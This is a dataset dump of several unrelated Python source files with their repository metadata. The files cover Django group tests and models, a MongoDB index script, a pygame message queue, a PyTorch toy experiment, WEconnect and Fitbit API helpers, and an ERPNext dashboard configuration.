        group = group_model.create_group('group-2-1@mechmooc.com', 'The A team', 2)
        group = group_model.create_group('group-2-2@mechmooc.com', 'The B team', 2)
        group = group_model.create_group('group-2-3@mechmooc.com', 'The C team', 2)
        s_1_groups = group_model.get_groups('1')
        self.assertIn('group-1-1@mechmooc.com', [group['address'] for group in s_1_groups])
    def test_get_member_groups(self):
        """get_member_groups returns exactly the groups a member belongs to."""
        group = group_model.create_group('ateam@mechmooc.com', 'The A team', 1)
        group_model.add_group_member(group['uri'], 'bob@mail.com')
        group = group_model.get_group(group['uri'])
        groups = group_model.get_member_groups('bob@mail.com')
        self.assertEqual(len(groups), 1)
        self.assertEqual(groups[0], group)
|
p2pu/mechanical-mooc
|
groups/tests.py
|
Python
|
mit
| 2,657
|
#!vpy/bin/python
"""Create the MongoDB indexes used by the slick production server.

Reads connection settings from the production config file and issues
``create_index`` calls for every collection the web app queries. Safe to
re-run: creating an existing index is a no-op.
"""
import pymongo
import sys

prod_config = '/opt/slick/prodserver.cfg'

# Config lines we care about; each looks like KEY="value".
_CONFIG_KEYS = (
    "MONGODB_HOSTNAME",
    "MONGODB_DBNAME",
    "MONGODB_USERNAME",
    "MONGODB_PASSWORD",
    "MONGODB_AUTHDB",
)

config = {}
with open(prod_config) as f:
    for line in f:
        for key in _CONFIG_KEYS:
            if line.startswith(key):
                config[key] = line.split('=')[1].strip().strip('"')

# Hostname and database name are required (KeyError if missing);
# credentials and auth database are optional.
connect_options = {
    "host": config['MONGODB_HOSTNAME'],
}
if 'MONGODB_USERNAME' in config:
    connect_options['username'] = config['MONGODB_USERNAME']
if 'MONGODB_PASSWORD' in config:
    connect_options['password'] = config['MONGODB_PASSWORD']
if 'MONGODB_AUTHDB' in config:
    connect_options['authSource'] = config['MONGODB_AUTHDB']

client = pymongo.MongoClient(**connect_options)
db = client[config['MONGODB_DBNAME']]


def _announce(message):
    """Write a progress message and flush so it appears immediately."""
    sys.stdout.write(message)
    sys.stdout.flush()


_announce("Creating index on projects...")
db.projects.create_index([("name", pymongo.ASCENDING)])
_announce("Done.\n")

_announce("Creating indexes on configurations...")
db.configurations.create_index([("name", pymongo.ASCENDING)])
db.configurations.create_index([("configurationType", pymongo.ASCENDING)])
db.configurations.create_index([("filename", pymongo.ASCENDING)])
_announce("Done.\n")

_announce("Creating indexes on testcases...")
db.testcases.create_index([("automationId", pymongo.ASCENDING)])
db.testcases.create_index([("automationKey", pymongo.ASCENDING)])
db.testcases.create_index([("project.id", pymongo.ASCENDING), ("component.id", pymongo.ASCENDING)])
db.testcases.create_index([("tags", pymongo.ASCENDING)])
_announce("Done.\n")

_announce("Creating indexes on results (could take a while)...")
db.results.create_index([("runstatus", pymongo.ASCENDING), ("hostname", pymongo.ASCENDING)])
db.results.create_index([("runstatus", pymongo.ASCENDING), ("testcase.automationTool", pymongo.ASCENDING), ("recorded", pymongo.DESCENDING)])
db.results.create_index([("testrun.testrunId", pymongo.ASCENDING), ("status", pymongo.ASCENDING), ("recorded", pymongo.DESCENDING)])
db.results.create_index([("build.buildId", pymongo.ASCENDING), ("status", pymongo.ASCENDING)])
db.results.create_index([("testcase.testcaseId", pymongo.ASCENDING), ("config.configId", pymongo.ASCENDING), ("release.releaseId", pymongo.ASCENDING), ("recorded", pymongo.DESCENDING)])
db.results.create_index([("testcase.testcaseId", pymongo.ASCENDING), ("config.configId", pymongo.ASCENDING), ("release.releaseId", pymongo.ASCENDING), ("testrun.testplanId", pymongo.ASCENDING), ("recorded", pymongo.DESCENDING)])
db.results.create_index([("testcase.testcaseId", pymongo.ASCENDING), ("recorded", pymongo.DESCENDING)])
_announce("Done.\n")

_announce("Creating indexes on testruns...")
db.testruns.create_index([("project.id", pymongo.ASCENDING), ("release.releaseId", pymongo.ASCENDING)])
db.testruns.create_index([("project.id", pymongo.ASCENDING), ("dateCreated", pymongo.DESCENDING)])
db.testruns.create_index([("build.buildId", pymongo.ASCENDING), ("dateCreated", pymongo.DESCENDING)])
_announce("Done.\n")

_announce("Creating index on system-configurations...")
db['system-configurations'].create_index([("configurationType", pymongo.ASCENDING), ("name", pymongo.ASCENDING)])
_announce("Done.\n")

_announce("Creating indexes on fs.chunks...")
db['fs.chunks'].create_index([("files_id", pymongo.ASCENDING), ("n", pymongo.ASCENDING)])
_announce("Done.\n")

# BUG FIX: this was a Python 2 print *statement*, a SyntaxError under
# Python 3 even though the rest of the script is Python-3 compatible.
print("Should be all done now.")
|
slickqa/slickqaweb
|
add-indexes.py
|
Python
|
apache-2.0
| 4,149
|
#!/usr/bin/env python3
# implementation of queue messaging system
from collections import deque
import pygame
from wargame.message import Message
from wargame.events import MessageType
class MessageQueue:
    """FIFO message queue with a priority (front-of-queue) lane.

    Pygame input events are drained into the queue and dispatched one at a
    time to a single registered listener callable.
    """

    def __init__(self):
        self.queue = deque()
        self.listener = None

    def set_listener(self, listener):
        """Register the callable (usually a scene) that receives messages."""
        self.listener = listener

    def add_message(self, message):
        """Append a normal-priority message at the RIGHT end of the queue."""
        self.queue.append(message)

    def add_priority_message(self, message):
        """Push a priority message onto the LEFT end so it is handled next."""
        self.queue.appendleft(message)

    def handle(self):
        """
        Handle the next message
        Return True to quit pygame
        """
        # Drain pending pygame inputs first; True means the game should quit.
        if self.get_inputs():
            return True
        if self.empty:
            return False
        # Dispatch the oldest message (LEFT end) to the listener, if any.
        next_message = self.queue.popleft()
        if self.listener is not None:
            self.listener(next_message)
        return False

    def get_inputs(self):
        """Convert all pending pygame events into queued messages."""
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                self.add_message(Message(MessageType.EXIT_GAME, None))
            elif event.type >= pygame.USEREVENT:
                # Timer / user-defined events carry no payload.
                self.add_message(Message(event.type, None))
            else:
                self.add_message(Message(event.type, event))
        return False

    def size(self):
        return len(self.queue)

    @property
    def empty(self):
        return len(self.queue) == 0
# singleton message system
# Shared module-level instance: import and use this rather than
# constructing additional queues.
MessageSystem = MessageQueue()
|
maximinus/wargame
|
wargame/wargame/scheduler.py
|
Python
|
gpl-3.0
| 1,834
|
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db import models
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
from django.utils.translation import ugettext_lazy as _
from openbudgets.commons.mixins import models as mixins
class InteractionManager(models.Manager):
    """Custom manager with helpers for querying Interaction objects."""

    def of_user(self, user):
        """Return this user's objects for this interaction type."""
        queryset = self.get_query_set()
        return queryset.filter(user=user)
class Interaction(mixins.TimeStampMixin, mixins.ClassMethodMixin):
    """An abstract base for user-object interactions.

    Concrete subclasses (Star, Follow, Share) record that a user acted on
    an arbitrary object via Django's contenttypes generic relation.
    """
    class Meta:
        abstract = True
        ordering = ['user', 'content_type', 'object_id']
        # A user can have at most one interaction of a given type per object.
        unique_together = (('user', 'content_type', 'object_id'),)
    objects = InteractionManager()
    # The acting user.
    user = models.ForeignKey(
        settings.AUTH_USER_MODEL,)
    # Generic foreign key: (content_type, object_id) resolve to content_object.
    content_type = models.ForeignKey(
        ContentType,
        editable=False,)
    object_id = models.PositiveIntegerField(
        editable=False,)
    content_object = generic.GenericForeignKey(
        'content_type', 'object_id',)
    def get_absolute_url(self):
        # Interactions have no page of their own; link to the target object.
        return self.content_object.get_absolute_url()
    def __unicode__(self):
        return "{user} <> {obj}".format(user=self.user, obj=self.content_object)
class Star(Interaction):
    """Objects that are starred by users."""
    class Meta:
        verbose_name = _('star')
        verbose_name_plural = _('stars')
class Follow(Interaction):
    """Objects that are followed by users."""
    class Meta:
        verbose_name = _('follow')
        verbose_name_plural = _('follows')
class Share(Interaction):
    """TODO: Objects that are shared by users."""
    class Meta:
        verbose_name = _('share')
        verbose_name_plural = _('shares')
|
openbudgets/openbudgets
|
openbudgets/apps/interactions/models.py
|
Python
|
bsd-3-clause
| 1,902
|
# We don't know enough about neural networks.
# In ind_datagen.py, I construct some extremely simplified neural networks
# and data sets to explore the properties of NNs.
#
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import TensorDataset, DataLoader
from torch.autograd import Variable
import torch.optim
import numpy as np
from amne.amnesia import AverageMeter
import time
import pickle
# Experiment 1
# Dimension filtering
class Filter(nn.Module):
    """Small MLP (100 -> 100 -> 100 -> 1) with ReLU activations.

    Used to probe whether a network can learn to ignore irrelevant input
    dimensions (only two of the 100 inputs matter in the experiment below).
    """

    def __init__(self):
        super(Filter, self).__init__()
        # Keep the attribute names lin1..lin3 stable: they determine the
        # state_dict keys used when the model is pickled.
        self.lin1 = nn.Linear(100, 100)
        self.lin2 = nn.Linear(100, 100)
        self.lin3 = nn.Linear(100, 1)

    def forward(self, input):
        hidden = F.relu(self.lin1(input))
        hidden = F.relu(self.lin2(hidden))
        return self.lin3(hidden)
def train(data_loader,model,criterion,optimizer,epoch):
    """Run one training epoch of *model* over *data_loader*.

    Relies on the module-level ``batch_time`` and ``batch_loss``
    AverageMeter instances (created in the ``__main__`` block) for
    progress tracking, and requires a CUDA device: every batch is moved
    to the GPU before the forward pass.
    """
    end=time.time()
    for i,(input,target) in enumerate(data_loader):
        input=Variable(input.cuda())
        target=Variable(target.cuda())
        target=target.float()
        output=model(input)
        loss=criterion(output,target)
        # BUG FIX: `loss.data[0]` raises on PyTorch >= 0.5, where losses
        # are 0-dim tensors; `.item()` is the supported scalar accessor.
        batch_loss.update(loss.item(),input.size(0))
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
        batch_time.update(time.time()-end)
        end=time.time()
        print_freq=10
        if i%print_freq==0:
            print("Epoch:[{0:4}][{1:3}/{2:3}]\t"
                'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
                'Loss {loss.val:.4f} ({loss.avg:.4f})\t'.format(
                epoch, i, len(data_loader), batch_time=batch_time,
                loss=batch_loss))
if __name__=="__main__":
    # Synthetic regression task: the target depends only on the first two
    # of 100 input dimensions, so the network must learn to "filter" the
    # other 98 out.
    input=np.random.normal(size=(200000,100))
    target=3*input[:,0]+7*input[:,1]
    input=torch.Tensor(input)
    target=torch.FloatTensor(target)
    ds=TensorDataset(input,target)
    dl=DataLoader(ds,batch_size=1024,shuffle=True)
    model=Filter().cuda()
    criterion = nn.SmoothL1Loss().cuda()
    optimizer=torch.optim.Adam(model.parameters(),lr=0.001)
    # Module-level meters read by train() for progress reporting.
    batch_time=AverageMeter()
    batch_loss=AverageMeter()
    epochs=200
    # nn.Module.train(): puts the model in training mode (this is the
    # method, distinct from the train() function defined above).
    model.train()
    for epoch in range(epochs):
        train(dl,model,criterion,optimizer,epoch)
    # Persist only the weights, not the module object itself.
    pickle.dump(model.state_dict(),open("last_model_linear.pickle",'wb'))
|
Fuchai/Philosophy-Machine
|
analysis/ind_datagen.py
|
Python
|
apache-2.0
| 2,328
|
"""
Contains various helpers for use by the Flask application.\n
Created by Abigail Franz on 3/13/2018.\n
Last modified by Abigail Franz on 5/5/2018.
"""
import logging, sys
import json, requests
from datetime import datetime, timedelta, MAXYEAR
#from background import db
#from app.models import Activity
logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
WC_URL = "https://palalinq.herokuapp.com/api/People"
WC_DATE_FMT = "%Y-%m-%dT%H:%M:%S.%fZ"
TODAY = datetime(datetime.now().year, datetime.now().month, datetime.now().day)
def login_to_wc(email, password):
	"""
	Log user into WEconnect, producing an ID and access token that will last
	90 days.

	Assumptions: People already have a WeConnect account (email).
	Outcome: all successful login requests return an id and a NEW access token.

	:param String email: the user's WEconnect username (email address)
	:param String password: the user's WEconnect password
	:return: ``(False, ())`` on failure, else ``(True, (wc_id, wc_token))``
	"""
	response = requests.post(
		"{}/login".format(WC_URL),
		data={"email": email, "password": password})
	if response.status_code != 200:
		return False, ()
	body = response.json()
	user_id = str(body["accessToken"]["userId"])
	token = str(body["accessToken"]["id"])
	logging.debug("WC Login attempt returns: {}".format(user_id))
	# NOTE(review): str() never returns None, so this guard looks dead;
	# kept for exact parity with the original behavior.
	if user_id is None:
		return False, ()
	return True, (user_id, token)
def check_wc_token_status(wc_user_id, wc_token):
	"""
	Check whether a WEconnect access token is still valid; the API returns
	a 401 when the token has expired or been revoked.

	:param wc_user_id: the user's WEconnect ID
	:param wc_token: the user's WEconnect access token
	:return: True if the token is valid, False otherwise
	"""
	logging.info("CHECKING STATUS")
	url = "{}/{}?access_token={}".format(WC_URL, wc_user_id, wc_token)
	result = requests.get(url)
	logging.debug("Result: {}".format(result.status_code))
	if result.status_code != 200:
		# BUG FIX: was `print("Response: {}").format(...)`, which called
		# .format() on print()'s None return value, raising AttributeError.
		print("Response: {}".format(
			"Token invalid" if result.status_code == 401 else result.status_code))
		return False
	else:
		# BUG FIX: same misplaced .format() as above.
		print("Token for User {} is good".format(wc_user_id))
		return True
def get_wc_activities(wc_id, wc_token):
	"""
	Pull all of a user's activities from the WEconnect backend and parse
	them into database-ready dicts.

	:param wc_id: a user's WEconnect ID
	:param wc_token: the user's WEconnect access token
	:return: a list of activity dicts (empty on any request failure)
	"""
	url = "{}/{}/activities?access_token={}".format(WC_URL, wc_id,
		wc_token)
	response = requests.get(url)
	if response.status_code != 200:
		# Return an empty list if the request was unsuccessful
		return []
	# Convert each raw JSON activity into the dict shape produced by
	# wc_json_to_db. (Dead commented-out Activity/db.session code removed.)
	return [wc_json_to_db(item) for item in response.json()]
def wc_json_to_db(wc_act):
	"""
	Given a JSON activity object from WEconnect, convert it to an activity
	dict compatible with the database.

	:param dict wc_act: an activity from WEconnect in JSON format
	:return: dict with keys ``id``, ``name``, ``expiration``, ``user`` (None)
	"""
	# Determine the start and end times of one occurrence.
	ts = datetime.strptime(wc_act["dateStart"], WC_DATE_FMT)
	te = ts + timedelta(minutes=wc_act["duration"])
	# Determine the expiration: far-future by default, the end of the single
	# occurrence for non-repeating activities, or the explicit repeat-end
	# date when one is given (which takes precedence).
	expiration = datetime(MAXYEAR, 12, 31)
	if wc_act["repeat"] == "never":
		expiration = te
	# IDIOM FIX: compare against None with `is not`, not `!=`.
	if wc_act["repeatEnd"] is not None:
		expiration = datetime.strptime(wc_act["repeatEnd"], WC_DATE_FMT)
	return {
		"id": wc_act["activityId"],
		"name": wc_act["name"],
		"expiration": expiration,
		# No user is known at this point; the caller attaches one later.
		"user": None,
	}
def complete_fb_login(fb_response):
	"""
	Extract the Fitbit access token and the embedded PowerToken username
	from the JSON payload that Fitbit sent back.

	:param bytes fb_response: the data returned from Fitbit (UTF-8 JSON)
	:return: ``(access_token, username)`` tuple
	"""
	decoded = fb_response.decode("utf-8")
	payload = json.loads(decoded)
	logging.debug(payload)
	return payload["tok"], payload["username"]
def fb_updateUserGoal(fbtoken):
	"""
	Set the user's daily Fitbit step goal to 100,000 steps.

	:param String fbtoken: the user's Fitbit access token
	:return: the new step goal on success (HTTP 200), otherwise None
	"""
	BASE_URL = "https://api.fitbit.com/1/user/-"
	url = "{}/activities/goals/daily.json".format(BASE_URL)
	new_step_goal = 100000
	params = {
		"period" : "daily",
		"type" : "steps",
		"value" : new_step_goal
	}
	# BUG FIX: the original read the undefined name `fb_token`, raising
	# NameError on every call; the parameter is named `fbtoken`.
	auth_headers = {"Authorization": "Bearer " + fbtoken}
	response = requests.post(url, headers=auth_headers, params=params)
	if response.status_code == 200:
		return response.json()["goals"]["steps"]
|
jazzij/powertoken
|
powertoken/api_util.py
|
Python
|
mit
| 4,691
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2011, 2012 Carlos Jenkins <cjenkins@softwarelibrecr.org>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
from .locales import *
|
carlos-jenkins/nested
|
nested/modules/locales/__init__.py
|
Python
|
gpl-2.0
| 822
|
from frappe import _
def get_data():
	"""Dashboard configuration for the Customer doctype.

	Returns the heatmap settings, the link fieldname, and the grouped
	transaction doctypes shown on the Customer dashboard.
	"""
	sections = [
		(_('Pre Sales'), ['Opportunity', 'Quotation']),
		(_('Orders'), ['Sales Order', 'Delivery Note', 'Sales Invoice']),
		(_('Support'), ['Issue']),
		(_('Projects'), ['Project']),
		(_('Pricing'), ['Pricing Rule']),
		(_('Subscriptions'), ['Subscription']),
	]
	return {
		'heatmap': True,
		'heatmap_message': _('This is based on transactions against this Customer. See timeline below for details'),
		'fieldname': 'customer',
		'transactions': [
			{'label': label, 'items': items} for label, items in sections
		],
	}
|
patilsangram/erpnext
|
erpnext/selling/doctype/customer/customer_dashboard.py
|
Python
|
gpl-3.0
| 679
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.